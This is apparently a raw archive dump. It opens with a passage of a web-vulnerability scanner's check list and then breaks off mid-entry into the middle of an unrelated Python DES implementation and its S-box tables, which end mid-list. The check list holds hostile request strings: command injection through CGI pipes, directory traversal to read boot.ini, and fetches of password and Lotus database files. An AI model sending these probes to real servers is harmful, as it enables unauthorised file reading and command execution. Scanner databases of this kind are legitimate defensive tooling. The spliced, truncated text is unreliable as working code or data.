c,iis,@CGIDIRS,post16.exe,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,iis,@CGIDIRS,post32.exe|dir%20c:\,200,GET,"post32 can execute arbitrary commands" c,iis,@CGIDIRS,sensepost.exe?/c+dir,200,GET,"sensepost can execute arbitrary commands" c,iis,@CGIDIRS,shtml.ddl,200,GET,"This may allow attackers to retrieve document source." c,iis,@CGIDIRS,SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3,"boot.ini",GET,"Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade." c,iis,@CGIDIRS,stats/statsbrowse.asp?filepath=c:\&Opt=3,"boot.ini",GET,"Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade." c,iis,@CGIDIRS,test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\,"boot.ini",GET,"This CGI allows attackers to read files from the server." c,jrun,/,./,"Index of ",GET,"Appending '/./' to a directory allows indexing" #false positives - dave ##c,lotus,/,"%00.nsf/../lotus/domino/notes.ini",200,GET,"The server allows the notes.ini file to be retrieved." c,lotus,/,?OpenServer,"\/icons\/abook\.gif",GET,"This install allows remote users to enumerate DB names, see http://www.securiteam.com/securitynews/6W0030U35W.html" c,lotus,/,agentrunner.nsf,200,GET,"This database can be read without authentication." c,lotus,/,bookmark.nsf,200,GET,"This database can be read without authentication." c,lotus,/,catalog.nsf,200,GET,"A list of server databases can be retrieved." c,lotus,/,cersvr.nsf,200,GET,"Server certificate data can be accessed remotely." c,lotus,/,collect4.nsf,200,GET,"This database can be read without authentication." c,lotus,/,database.nsf,200,GET,"This database can be read without authentication." c,lotus,/,domcfg.nsf,200,GET,"This database can be read without authentication." c,lotus,/,domlog.nsf,200,GET,"The domain server logs can be accessed remotely." c,lotus,/,events4.nsf,200,GET,"The events log can be accessed remotely." c,lotus,/,log.nsf,200,GET,"The server log is remotely accessible." c,lotus,/,mab.nsf,200,GET,"This database can be read without authentication." c,lotus,/,mail.box,200,GET,"The mail database can be read without authentication." c,lotus,/,mailw46.nsf,200,GET,"This database can be read without authentication." c,lotus,/,names.nsf,200,GET,"User names and groups can be accessed remotely (possibly password hashes a well)" c,lotus,/,ntsync4.nsf,200,GET,"This database can be read without authentication." c,lotus,/,open?,200,GET,"The Lotus server allows directory browsing by putting ?open after a directory name." c,lotus,/,setup.nsf,200,GET,"The server can be configured remotely, or current setup can be downloaded." c,lotus,/,statrep.nsf,200,GET,"Any reports generated by the admins can be retrieved." c,lotus,/,today.nsf,200,GET,"This database can be read without authentication." c,lotus,/,webadmin.nsf,200,GET,"The server admin database can be accessed remotely." c,lotus,/cgi-bin/,testing_whatever,"domino/cgi-bin",GET,"The Domino server reveals the system path to the cgi-bin directory by requesting a bogus CGI." c,lotus,@CGIDIRS,com5..........................................................................................................................................................................................................................box,"Execution of Perl script",GET,"Lotus reveals file system paths when requesting DOS devices with bad syntax." c,lotus,@CGIDIRS,com5.java,"Execution of",GET,"Lotus reveals file system paths when requesting DOS devices with bad syntax." c,lotus,@CGIDIRS,com5.pl,"Execution of Perl script",GET,"Lotus reveals file system paths when requesting DOS devices with bad syntax." c,mipcd,/,LOGIN.PWD,200,GET,"MIPCD password file (passwords are not encrypted). MIPDCD should not have the web interface enabled." c,mipcd,/USER/,CONFIG.AP,200,GET,"MIPCD configuration information. MIPCD should not have the web interface enabled." c,mycio,/,.../.../.../,"Last Modified",GET,"The myCIO server allows directory traversal." c,mywebserver,/,JUNK(223)', u = (R ^ s[S]) t = R ^ s[S + 1] t = ((t >> 4) + (t << 28)) L = L ^ (des_SPtrans[1][int((t ) & U32(0x3f))] | \ des_SPtrans[3][int((t >> 8) & U32(0x3f))] | \ des_SPtrans[5][int((t >> 16) & U32(0x3f))] | \ des_SPtrans[7][int((t >> 24) & U32(0x3f))] | \ des_SPtrans[0][int((u ) & U32(0x3f))] | \ des_SPtrans[2][int((u >> 8) & U32(0x3f))] | \ des_SPtrans[4][int((u >> 16) & U32(0x3f))] | \ des_SPtrans[6][int((u >> 24) & U32(0x3f))]) #print 'LRS:', L, R, S, u, t return ((L, R, S), u, t, s) def PERM_OP (tup, n, m): "tup - (a, b, t)" a, b, t = tup t = ((a >> n) ^ b) & m b = b ^ t a = a ^ (t << n) return (a, b, t) def HPERM_OP (tup, n, m): "tup - (a, t)" a, t = tup t = ((a << (16 - n)) ^ a) & m a = a ^ t ^ (t >> (16 - n)) return (a, t) shifts2 = [0,0,1,1,1,1,1,1,0,1,1,1,1,1,1,0] class DES: KeySched = None # des_key_schedule def __init__(self, key_str): # key - UChar[8] key = [] for i in key_str: key.append(ord(i)) #print 'key:', key self.KeySched = des_set_key(key) #print 'schedule:', self.KeySched, len(self.KeySched) def decrypt(self, str): # block - UChar[] block = [] for i in str: block.append(ord(i)) #print block block = des_ecb_encrypt(block, self.KeySched, 0) res = '' for i in block: res = res + (chr(i)) return res def encrypt(self, str): # block - UChar[] block = [] for i in str: block.append(ord(i)) block = des_ecb_encrypt(block, self.KeySched, 1) res = '' for i in block: res = res + (chr(i)) return res #------------------------ def des_encript(input, ks, encrypt): # input - U32[] # output - U32[] # ks - des_key_shedule - U32[2][16] # encrypt - int # l, r, t, u - U32 # i - int # s - U32[] l = input[0] r = input[1] t = U32(0) u = U32(0) r, l, t = PERM_OP((r, l, t), 4, U32(0x0f0f0f0fL)) l, r, t = PERM_OP((l, r, t), 16, U32(0x0000ffffL)) r, l, t = PERM_OP((r, l, t), 2, U32(0x33333333L)) l, r, t = PERM_OP((l, r, t), 8, U32(0x00ff00ffL)) r, l, t = PERM_OP((r, l, t), 1, U32(0x55555555L)) t = (r << 1)|(r >> 31) r = (l << 1)|(l >> 31) l = t s = ks # ??????????????? #print l, r if(encrypt): for i in range(0, 32, 4): rtup, u, t, s = D_ENCRYPT((l, r, i + 0), u, t, s) l = rtup[0] r = rtup[1] rtup, u, t, s = D_ENCRYPT((r, l, i + 2), u, t, s) r = rtup[0] l = rtup[1] else: for i in range(30, 0, -4): rtup, u, t, s = D_ENCRYPT((l, r, i - 0), u, t, s) l = rtup[0] r = rtup[1] rtup, u, t, s = D_ENCRYPT((r, l, i - 2), u, t, s) r = rtup[0] l = rtup[1] #print l, r l = (l >> 1)|(l << 31) r = (r >> 1)|(r << 31) r, l, t = PERM_OP((r, l, t), 1, U32(0x55555555L)) l, r, t = PERM_OP((l, r, t), 8, U32(0x00ff00ffL)) r, l, t = PERM_OP((r, l, t), 2, U32(0x33333333L)) l, r, t = PERM_OP((l, r, t), 16, U32(0x0000ffffL)) r, l, t = PERM_OP((r, l, t), 4, U32(0x0f0f0f0fL)) output = [l] output.append(r) l, r, t, u = U32(0), U32(0), U32(0), U32(0) return output def des_ecb_encrypt(input, ks, encrypt): # input - des_cblock - UChar[8] # output - des_cblock - UChar[8] # ks - des_key_shedule - U32[2][16] # encrypt - int #print input l0 = c2l(input[0:4]) l1 = c2l(input[4:8]) ll = [l0] ll.append(l1) #print ll ll = des_encript(ll, ks, encrypt) #print ll l0 = ll[0] l1 = ll[1] output = l2c(l0) output = output + l2c(l1) #print output l0, l1, ll[0], ll[1] = U32(0), U32(0), U32(0), U32(0) return output def des_set_key(key): # key - des_cblock - UChar[8] # schedule - des_key_schedule # register unsigned long c,d,t,s; # register unsigned char *in; # register unsigned long *k; # register int i; #k = schedule # in = key k = [] c = c2l(key[0:4]) d = c2l(key[4:8]) t = U32(0) d, c, t = PERM_OP((d, c, t), 4, U32(0x0f0f0f0fL)) c, t = HPERM_OP((c, t), -2, U32(0xcccc0000L)) d, t = HPERM_OP((d, t), -2, U32(0xcccc0000L)) d, c, t = PERM_OP((d, c, t), 1, U32(0x55555555L)) c, d, t = PERM_OP((c, d, t), 8, U32(0x00ff00ffL)) d, c, t = PERM_OP((d, c, t), 1, U32(0x55555555L)) d = (((d & U32(0x000000ffL)) << 16)|(d & U32(0x0000ff00L))|((d & U32(0x00ff0000L)) >> 16)|((c & U32(0xf0000000L)) >> 4)) c = c & U32(0x0fffffffL) for i in range(16): if (shifts2[i]): c = ((c >> 2)|(c << 26)) d = ((d >> 2)|(d << 26)) else: c = ((c >> 1)|(c << 27)) d = ((d >> 1)|(d << 27)) c = c & U32(0x0fffffffL) d = d & U32(0x0fffffffL) s= des_skb[0][int((c ) & U32(0x3f))]|\ des_skb[1][int(((c>> 6) & U32(0x03))|((c>> 7) & U32(0x3c)))]|\ des_skb[2][int(((c>>13) & U32(0x0f))|((c>>14) & U32(0x30)))]|\ des_skb[3][int(((c>>20) & U32(0x01))|((c>>21) & U32(0x06)) | ((c>>22) & U32(0x38)))] t= des_skb[4][int((d ) & U32(0x3f) )]|\ des_skb[5][int(((d>> 7) & U32(0x03))|((d>> 8) & U32(0x3c)))]|\ des_skb[6][int((d>>15) & U32(0x3f) )]|\ des_skb[7][int(((d>>21) & U32(0x0f))|((d>>22) & U32(0x30)))] #print s, t k.append(((t << 16)|(s & U32(0x0000ffffL))) & U32(0xffffffffL)) s = ((s >> 16)|(t & U32(0xffff0000L))) s = (s << 4)|(s >> 28) k.append(s & U32(0xffffffffL)) schedule = k return schedule spkproxy/ntlm/des_data.py0100664000076500007650000004701207562540467014525 0ustar davedave# This file is part of 'NTLM Authorization Proxy Server' # Copyright 2001 Dmitry A. Rozmanov # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # from U32 import U32 # static unsigned long des_SPtrans[8][64]={ des_SPtrans =\ [ #nibble 0 [ U32(0x00820200L), U32(0x00020000L), U32(0x80800000L), U32(0x80820200L), U32(0x00800000L), U32(0x80020200L), U32(0x80020000L), U32(0x80800000L), U32(0x80020200L), U32(0x00820200L), U32(0x00820000L), U32(0x80000200L), U32(0x80800200L), U32(0x00800000L), U32(0x00000000L), U32(0x80020000L), U32(0x00020000L), U32(0x80000000L), U32(0x00800200L), U32(0x00020200L), U32(0x80820200L), U32(0x00820000L), U32(0x80000200L), U32(0x00800200L), U32(0x80000000L), U32(0x00000200L), U32(0x00020200L), U32(0x80820000L), U32(0x00000200L), U32(0x80800200L), U32(0x80820000L), U32(0x00000000L), U32(0x00000000L), U32(0x80820200L), U32(0x00800200L), U32(0x80020000L), U32(0x00820200L), U32(0x00020000L), U32(0x80000200L), U32(0x00800200L), U32(0x80820000L), U32(0x00000200L), U32(0x00020200L), U32(0x80800000L), U32(0x80020200L), U32(0x80000000L), U32(0x80800000L), U32(0x00820000L), U32(0x80820200L), U32(0x00020200L), U32(0x00820000L), U32(0x80800200L), U32(0x00800000L), U32(0x80000200L), U32(0x80020000L), U32(0x00000000L), U32(0x00020000L), U32(0x00800000L), U32(0x80800200L), U32(0x00820200L), U32(0x80000000L), U32(0x80820000L), U32(0x00000200L), U32(0x80020200L), ], #nibble 1 [ U32(0x10042004L), U32(0x00000000L), U32(0x00042000L), U32(0x10040000L), U32(0x10000004L), U32(0x00002004L), U32(0x10002000L), U32(0x00042000L), U32(0x00002000L), U32(0x10040004L), U32(0x00000004L), U32(0x10002000L), U32(0x00040004L), U32(0x10042000L), U32(0x10040000L), U32(0x00000004L), U32(0x00040000L), U32(0x10002004L), U32(0x10040004L), U32(0x00002000L), U32(0x00042004L), U32(0x10000000L), U32(0x00000000L), U32(0x00040004L), U32(0x10002004L), U32(0x00042004L), U32(0x10042000L), U32(0x10000004L), U32(0x10000000L), U32(0x00040000L), U32(0x00002004L), U32(0x10042004L), U32(0x00040004L), U32(0x10042000L), U32(0x10002000L), U32(0x00042004L), U32(0x10042004L), U32(0x00040004L), U32(0x10000004L), U32(0x00000000L), U32(0x10000000L), U32(0x00002004L), U32(0x00040000L), U32(0x10040004L), U32(0x00002000L), U32(0x10000000L), U32(0x00042004L), U32(0x10002004L), U32(0x10042000L), U32(0x00002000L), U32(0x00000000L), U32(0x10000004L), U32(0x00000004L), U32(0x10042004L), U32(0x00042000L), U32(0x10040000L), U32(0x10040004L), U32(0x00040000L), U32(0x00002004L), U32(0x10002000L), U32(0x10002004L), U32(0x00000004L), U32(0x10040000L), U32(0x00042000L), ], #nibble 2 [ U32(0x41000000L), U32(0x01010040L), U32(0x00000040L), U32(0x41000040L), U32(0x40010000L), U32(0x01000000L), U32(0x41000040L), U32(0x00010040L), U32(0x01000040L), U32(0x00010000L), U32(0x01010000L), U32(0x40000000L), U32(0x41010040L), U32(0x40000040L), U32(0x40000000L), U32(0x41010000L), U32(0x00000000L), U32(0x40010000L), U32(0x01010040L), U32(0x00000040L), U32(0x40000040L), U32(0x41010040L), U32(0x00010000L), U32(0x41000000L), U32(0x41010000L), U32(0x01000040L), U32(0x40010040L), U32(0x01010000L), U32(0x00010040L), U32(0x00000000L), U32(0x01000000L), U32(0x40010040L), U32(0x01010040L), U32(0x00000040L), U32(0x40000000L), U32(0x00010000L), U32(0x40000040L), U32(0x40010000L), U32(0x01010000L), U32(0x41000040L), U32(0x00000000L), U32(0x01010040L), U32(0x00010040L), U32(0x41010000L), U32(0x40010000L), U32(0x01000000L), U32(0x41010040L), U32(0x40000000L), U32(0x40010040L), U32(0x41000000L), U32(0x01000000L), U32(0x41010040L), U32(0x00010000L), U32(0x01000040L), U32(0x41000040L), U32(0x00010040L), U32(0x01000040L), U32(0x00000000L), U32(0x41010000L), U32(0x40000040L), U32(0x41000000L), U32(0x40010040L), U32(0x00000040L), U32(0x01010000L), ], #nibble 3 [ U32(0x00100402L), U32(0x04000400L), U32(0x00000002L), U32(0x04100402L), U32(0x00000000L), U32(0x04100000L), U32(0x04000402L), U32(0x00100002L), U32(0x04100400L), U32(0x04000002L), U32(0x04000000L), U32(0x00000402L), U32(0x04000002L), U32(0x00100402L), U32(0x00100000L), U32(0x04000000L), U32(0x04100002L), U32(0x00100400L), U32(0x00000400L), U32(0x00000002L), U32(0x00100400L), U32(0x04000402L), U32(0x04100000L), U32(0x00000400L), U32(0x00000402L), U32(0x00000000L), U32(0x00100002L), U32(0x04100400L), U32(0x04000400L), U32(0x04100002L), U32(0x04100402L), U32(0x00100000L), U32(0x04100002L), U32(0x00000402L), U32(0x00100000L), U32(0x04000002L), U32(0x00100400L), U32(0x04000400L), U32(0x00000002L), U32(0x04100000L), U32(0x04000402L), U32(0x00000000L), U32(0x00000400L), U32(0x00100002L), U32(0x00000000L), U32(0x04100002L), U32(0x04100400L), U32(0x00000400L), U32(0x04000000L), U32(0x04100402L), U32(0x00100402L), U32(0x00100000L), U32(0x04100402L), U32(0x00000002L), U32(0x04000400L), U32(0x00100402L), U32(0x00100002L), U32(0x00100400L), U32(0x04100000L), U32(0x04000402L), U32(0x00000402L), U32(0x04000000L), U32(0x04000002L), U32(0x04100400L), ], #nibble 4 [ U32(0x02000000L), U32(0x00004000L), U32(0x00000100L), U32(0x02004108L), U32(0x02004008L), U32(0x02000100L), U32(0x00004108L), U32(0x02004000L), U32(0x00004000L), U32(0x00000008L), U32(0x02000008L), U32(0x00004100L), U32(0x02000108L), U32(0x02004008L), U32(0x02004100L), U32(0x00000000L), U32(0x00004100L), U32(0x02000000L), U32(0x00004008L), U32(0x00000108L), U32(0x02000100L), U32(0x00004108L), U32(0x00000000L), U32(0x02000008L), U32(0x00000008L), U32(0x02000108L), U32(0x02004108L), U32(0x00004008L), U32(0x02004000L), U32(0x00000100L), U32(0x00000108L), U32(0x02004100L), U32(0x02004100L), U32(0x02000108L), U32(0x00004008L), U32(0x02004000L), U32(0x00004000L), U32(0x00000008L), U32(0x02000008L), U32(0x02000100L), U32(0x02000000L), U32(0x00004100L), U32(0x02004108L), U32(0x00000000L), U32(0x00004108L), U32(0x02000000L), U32(0x00000100L), U32(0x00004008L), U32(0x02000108L), U32(0x00000100L), U32(0x00000000L), U32(0x02004108L), U32(0x02004008L), U32(0x02004100L), U32(0x00000108L), U32(0x00004000L), U32(0x00004100L), U32(0x02004008L), U32(0x02000100L), U32(0x00000108L), U32(0x00000008L), U32(0x00004108L), U32(0x02004000L), U32(0x02000008L), ], #nibble 5 [ U32(0x20000010L), U32(0x00080010L), U32(0x00000000L), U32(0x20080800L), U32(0x00080010L), U32(0x00000800L), U32(0x20000810L), U32(0x00080000L), U32(0x00000810L), U32(0x20080810L), U32(0x00080800L), U32(0x20000000L), U32(0x20000800L), U32(0x20000010L), U32(0x20080000L), U32(0x00080810L), U32(0x00080000L), U32(0x20000810L), U32(0x20080010L), U32(0x00000000L), U32(0x00000800L), U32(0x00000010L), U32(0x20080800L), U32(0x20080010L), U32(0x20080810L), U32(0x20080000L), U32(0x20000000L), U32(0x00000810L), U32(0x00000010L), U32(0x00080800L), U32(0x00080810L), U32(0x20000800L), U32(0x00000810L), U32(0x20000000L), U32(0x20000800L), U32(0x00080810L), U32(0x20080800L), U32(0x00080010L), U32(0x00000000L), U32(0x20000800L), U32(0x20000000L), U32(0x00000800L), U32(0x20080010L), U32(0x00080000L), U32(0x00080010L), U32(0x20080810L), U32(0x00080800L), U32(0x00000010L), U32(0x20080810L), U32(0x00080800L), U32(0x00080000L), U32(0x20000810L), U32(0x20000010L), U32(0x20080000L), U32(0x00080810L), U32(0x00000000L), U32(0x00000800L), U32(0x20000010L), U32(0x20000810L), U32(0x20080800L), U32(0x20080000L), U32(0x00000810L), U32(0x00000010L), U32(0x20080010L), ], #nibble 6 [ U32(0x00001000L), U32(0x00000080L), U32(0x00400080L), U32(0x00400001L), U32(0x00401081L), U32(0x00001001L), U32(0x00001080L), U32(0x00000000L), U32(0x00400000L), U32(0x00400081L), U32(0x00000081L), U32(0x00401000L), U32(0x00000001L), U32(0x00401080L), U32(0x00401000L), U32(0x00000081L), U32(0x00400081L), U32(0x00001000L), U32(0x00001001L), U32(0x00401081L), U32(0x00000000L), U32(0x00400080L), U32(0x00400001L), U32(0x00001080L), U32(0x00401001L), U32(0x00001081L), U32(0x00401080L), U32(0x00000001L), U32(0x00001081L), U32(0x00401001L), U32(0x00000080L), U32(0x00400000L), U32(0x00001081L), U32(0x00401000L), U32(0x00401001L), U32(0x00000081L), U32(0x00001000L), U32(0x00000080L), U32(0x00400000L), U32(0x00401001L), U32(0x00400081L), U32(0x00001081L), U32(0x00001080L), U32(0x00000000L), U32(0x00000080L), U32(0x00400001L), U32(0x00000001L), U32(0x00400080L), U32(0x00000000L), U32(0x00400081L), U32(0x00400080L), U32(0x00001080L), U32(0x00000081L), U32(0x00001000L), U32(0x00401081L), U32(0x00400000L), U32(0x00401080L), U32(0x00000001L), U32(0x00001001L), U32(0x00401081L), U32(0x00400001L), U32(0x00401080L), U32(0x00401000L), U32(0x00001001L), ], #nibble 7 [ U32(0x08200020L), U32(0x08208000L), U32(0x00008020L), U32(0x00000000L), U32(0x08008000L), U32(0x00200020L), U32(0x08200000L), U32(0x08208020L), U32(0x00000020L), U32(0x08000000L), U32(0x00208000L), U32(0x00008020L), U32(0x00208020L), U32(0x08008020L), U32(0x08000020L), U32(0x08200000L), U32(0x00008000L), U32(0x00208020L), U32(0x00200020L), U32(0x08008000L), U32(0x08208020L), U32(0x08000020L), U32(0x00000000L), U32(0x00208000L), U32(0x08000000L), U32(0x00200000L), U32(0x08008020L), U32(0x08200020L), U32(0x00200000L), U32(0x00008000L), U32(0x08208000L), U32(0x00000020L), U32(0x00200000L), U32(0x00008000L), U32(0x08000020L), U32(0x08208020L), U32(0x00008020L), U32(0x08000000L), U32(0x00000000L), U32(0x00208000L), U32(0x08200020L), U32(0x08008020L), U32(0x08008000L), U32(0x00200020L), U32(0x08208000L), U32(0x00000020L), U32(0x00200020L), U32(0x08008000L), U32(0x08208020L), U32(0x00200000L), U32(0x08200000L), U32(0x08000020L), U32(0x00208000L), U32(0x00008020L), U32(0x08008020L), U32(0x08200000L), U32(0x00000020L), U32(0x08208000L), U32(0x00208020L), U32(0x00000000L), U32(0x08000000L), U32(0x08200020L), U32(0x00008000L), U32(0x00208020L), ], ] #static unsigned long des_skb[8][64]={ des_skb = \ [ #for C bits (numbered as per FIPS 46) 1 2 3 4 5 6 [ U32(0x00000000L),U32(0x00000010L),U32(0x20000000L),U32(0x20000010L), U32(0x00010000L),U32(0x00010010L),U32(0x20010000L),U32(0x20010010L), U32(0x00000800L),U32(0x00000810L),U32(0x20000800L),U32(0x20000810L), U32(0x00010800L),U32(0x00010810L),U32(0x20010800L),U32(0x20010810L), U32(0x00000020L),U32(0x00000030L),U32(0x20000020L),U32(0x20000030L), U32(0x00010020L),U32(0x00010030L),U32(0x20010020L),U32(0x20010030L), U32(0x00000820L),U32(0x00000830L),U32(0x20000820L),U32(0x20000830L), U32(0x00010820L),U32(0x00010830L),U32(0x20010820L),U32(0x20010830L), U32(0x00080000L),U32(0x00080010L),U32(0x20080000L),U32(0x20080010L), U32(0x00090000L),U32(0x00090010L),U32(0x20090000L),U32(0x20090010L), U32(0x00080800L),U32(0x00080810L),U32(0x20080800L),U32(0x20080810L), U32(0x00090800L),U32(0x00090810L),U32(0x20090800L),U32(0x20090810L), U32(0x00080020L),U32(0x00080030L),U32(0x20080020L),U32(0x20080030L), U32(0x00090020L),U32(0x00090030L),U32(0x20090020L),U32(0x20090030L), U32(0x00080820L),U32(0x00080830L),U32(0x20080820L),U32(0x20080830L), U32(0x00090820L),U32(0x00090830L),U32(0x20090820L),U32(0x20090830L), ], #for C bits (numbered as per FIPS 46) 7 8 10 11 12 13 [ U32(0x00000000L),U32(0x02000000L),U32(0x00002000L),U32(0x02002000L), U32(0x00200000L),U32(0x02200000L),U32(0x00202000L),U32(0x02202000L), U32(0x00000004L),U32(0x02000004L),U32(0x00002004L),U32(0x02002004L), U32(0x00200004L),U32(0x02200004L),U32(0x00202004L),U32(0x02202004L), U32(0x00000400L),U32(0x02000400L),U32(0x00002400L),U32(0x02002400L), U32(0x00200400L),U32(0x02200400L),U32(0x00202400L),U32(0x02202400L), U32(0x00000404L),U32(0x02000404L),U32(0x00002404L),U32(0x02002404L), U32(0x00200404L),U32(0x02200404L),U32(0x00202404L),U32(0x02202404L), U32(0x10000000L),U32(0x12000000L),U32(0x10002000L),U32(0x12002000L), U32(0x10200000L),U32(0x12200000L),U32(0x10202000L),U32(0x12202000L), U32(0x10000004L),U32(0x12000004L),U32(0x10002004L),U32(0x12002004L), U32(0x10200004L),U32(0x12200004L),U32(0x10202004L),U32(0x12202004L), U32(0x10000400L),U32(0x12000400L),U32(0x10002400L),U32(0x12002400L), U32(0x10200400L),U32(0x12200400L),U32(0x10202400L),U32(0x12202400L), U32(0x10000404L),U32(0x12000404L),U32(0x10002404L),U32(0x12002404L), U32(0x10200404L),U32(0x12200404L),U32(0x10202404L),U32(0x12202404L), ], #for C bits (numbered as per FIPS 46) 14 15 16 17 19 20 [ U32(0x00000000L),U32(0x00000001L),U32(0x00040000L),U32(0x00040001L), U32(0x01000000L),U32(0x01000001L),U32(0x01040000L),U32(0x01040001L), U32(0x00000002L),U32(0x00000003L),U32(0x00040002L),U32(0x00040003L), U32(0x01000002L),U32(0x01000003L),U32(0x01040002L),U32(0x01040003L), U32(0x00000200L),U32(0x00000201L),U32(0x00040200L),U32(0x00040201L), U32(0x01000200L),U32(0x01000201L),U32(0x01040200L),U32(0x01040201L), U32(0x00000202L),U32(0x00000203L),U32(0x00040202L),U32(0x00040203L), U32(0x01000202L),U32(0x01000203L),U32(0x01040202L),U32(0x01040203L), U32(0x08000000L),U32(0x08000001L),U32(0x08040000L),U32(0x08040001L), U32(0x09000000L),U32(0x09000001L),U32(0x09040000L),U32(0x09040001L), U32(0x08000002L),U32(0x08000003L),U32(0x08040002L),U32(0x08040003L), U32(0x09000002L),U32(0x09000003L),U32(0x09040002L),U32(0x09040003L), U32(0x08000200L),U32(0x08000201L),U32(0x08040200L),U32(0x08040201L), U32(0x09000200L),U32(0x09000201L),U32(0x09040200L),U32(0x09040201L), U32(0x08000202L),U32(0x08000203L),U32(0x08040202L),U32(0x08040203L), U32(0x09000202L),U32(0x09000203L),U32(0x09040202L),U32(0x09040203L), ], #for C bits (numbered as per FIPS 46) 21 23 24 26 27 28 [ U32(0x00000000L),U32(0x00100000L),U32(0x00000100L),U32(0x00100100L), U32(0x00000008L),U32(0x00100008L),U32(0x00000108L),U32(0x00100108L), U32(0x00001000L),U32(0x00101000L),U32(0x00001100L),U32(0x00101100L), U32(0x00001008L),U32(0x00101008L),U32(0x00001108L),U32(0x00101108L), U32(0x04000000L),U32(0x04100000L),U32(0x04000100L),U32(0x04100100L), U32(0x04000008L),U32(0x04100008L),U32(0x04000108L),U32(0x04100108L), U32(0x04001000L),U32(0x04101000L),U32(0x04001100L),U32(0x04101100L), U32(0x04001008L),U32(0x04101008L),U32(0x04001108L),U32(0x04101108L), U32(0x00020000L),U32(0x00120000L),U32(0x00020100L),U32(0x00120100L), U32(0x00020008L),U32(0x00120008L),U32(0x00020108L),U32(0x00120108L), U32(0x00021000L),U32(0x00121000L),U32(0x00021100L),U32(0x00121100L), U32(0x00021008L),U32(0x00121008L),U32(0x00021108L),U32(0x00121108L), U32(0x04020000L),U32(0x04120000L),U32(0x04020100L),U32(0x04120100L), U32(0x04020008L),U32(0x04120008L),U32(0x04020108L),U32(0x04120108L), U32(0x04021000L),U32(0x04121000L),U32(0x04021100L),U32(0x04121100L), U32(0x04021008L),U32(0x04121008L),U32(0x04021108L),U32(0x04121108L), ], #for D bits (numbered as per FIPS 46) 1 2 3 4 5 6 [ U32(0x00000000L),U32(0x10000000L),U32(0x00010000L),U32(0x10010000L), U32(0x00000004L),U32(0x10000004L),U32(0x00010004L),U32(0x10010004L), U32(0x20000000L),U32(0x30000000L),U32(0x20010000L),U32(0x30010000L), U32(0x20000004L),U32(0x30000004L),U32(0x20010004L),U32(0x30010004L), U32(0x00100000L),U32(0x10100000L),U32(0x00110000L),U32(0x10110000L), U32(0x00100004L),U32(0x10100004L),U32(0x00110004L),U32(0x10110004L), U32(0x20100000L),U32(0x30100000L),U32(0x20110000L),U32(0x30110000L), U32(0x20100004L),U32(0x30100004L),U32(0x20110004L),U32(0x30110004L), U32(0x00001000L),U32(0x10001000L),U32(0x00011000L),U32(0x10011000L), U32(0x00001004L),U32(0x10001004L),U32(0x00011004L),U32(0x10011004L), U32(0x20001000L),U32(0x30001000L),U32(0x20011000L),U32(0x30011000L), U32(0x20001004L),U32(0x30001004L),U32(0x20011004L),U32(0x30011004L), U32(0x00101000L),U32(0x10101000L),U32(0x00111000L),U32(0x10111000L), U32(0x00101004L),U32(0x10101004L),U32(0x00111004L),U32(0x10111004L), U32(0x20101000L),U32(0x30101000L),U32(0x20111000L),U32(0x30111000L), U32(0x20101004L),U32(0x30101004L),U32(0x20111004L),U32(0x30111004L), ], #for D bits (numbered as per FIPS 46) 8 9 11 12 13 14 [ U32(0x00000000L),U32(0x08000000L),U32(0x00000008L),U32(0x08000008L), U32(0x00000400L),U32(0x08000400L),U32(0x00000408L),U32(0x08000408L), U32(0x00020000L),U32(0x08020000L),U32(0x00020008L),U32(0x08020008L), U32(0x00020400L),U32(0x08020400L),U32(0x00020408L),U32(0x08020408L), U32(0x00000001L),U32(0x08000001L),U32(0x00000009L),U32(0x08000009L), U32(0x00000401L),U32(0x08000401L),U32(0x00000409L),U32(0x08000409L), U32(0x00020001L),U32(0x08020001L),U32(0x00020009L),U32(0x08020009L), U32(0x00020401L),U32(0x08020401L),U32(0x00020409L),U32(0x08020409L), U32(0x02000000L),U32(0x0A000000L),U32(0x02000008L),U32(0x0A000008L), U32(0x02000400L),U32(0x0A000400L),U32(0x02000408L),U32(0x0A000408L), U32(0x02020000L),U32(0x0A020000L),U32(0x02020008L),U32(0x0A020008L), U32(0x02020400L),U32(0x0A020400L),U32(0x02020408L),U32(0x0A020408L), U32(0x02000001L),U32(0x0A000001L),U32(0x02000009L),U32(0x0A000009L), U32(0x02000401L),U32(0x0A000401L),U32(0x02000409L),U32(0x0A000409L), U32(0x02020001L),U32(0x0A020001L),U32(0x02020009L),U32(0x0A020009L), U32(0x02020401L),U32(0x0A020401L),U32(0x02020409L),U32(0x0A020409L), ], #for D bits (numbered as per FIPS 46) 16 17 18 19 20 21 [ U32(0x00000000L),U32(0x00000100L),U32(0x00080000L),U32(0x00080100L), U32(0x01000000L),U32(0x01000100L),U32(0x01080000L),U32(0x01080100L), U32(0x00000010L),U32(0x00000110L),U32(0x00080010L),U32(0x00080110L), U32(0x01000010L),U32(0x01000110L),U32(0x01080010L),U32(0x01080110L), U32(0x00200000L),U32(0x00200100L),U32(0x00280000L),U32(0x00280100L), U32(0x01200000L),U32(0x01200100L),U32(0x01280000L),U32(0x01280100L), U32(0x00200010L),U32(0x00200110L),U32(0x00280010L),U32(0x00280110L), U32(0x01200010L),U32(0x01200110L),U32(0x01280010L),U32(0x01280110L), U32(0x00000200L),U32(0x00000300L),U32(0x00080200L),U32(0x00080300L), U32(0x01000200L),U32(0x01000300L),U32(0x01080200L),U32(0x01080300L), U32(0x00000210L),U32(0x00000310L),U32(0x00080210L),U32(0x00080310L), U32(0x01000210L),U32(0x01000310L),U32(0x01080210L),U32(0x01080310L), U32(0x00200200L),U32(0x00200300L),U32(0x00280200L),U32(0x00280300L), U32(0x01200200L),U32(0x01200300L),U32(0x01280200L),U32(0x01280300L), U32(0x00200210L),U32(0x00200310L),U32(0x00280210L),U32(0x00280310L), U32(0x01200210L),U32(0x01200310L),U32(0x01280210L),U32(0x01280310L), ], #for D bits (numbered as per FIPS 46) 22 23 24 25 27 28 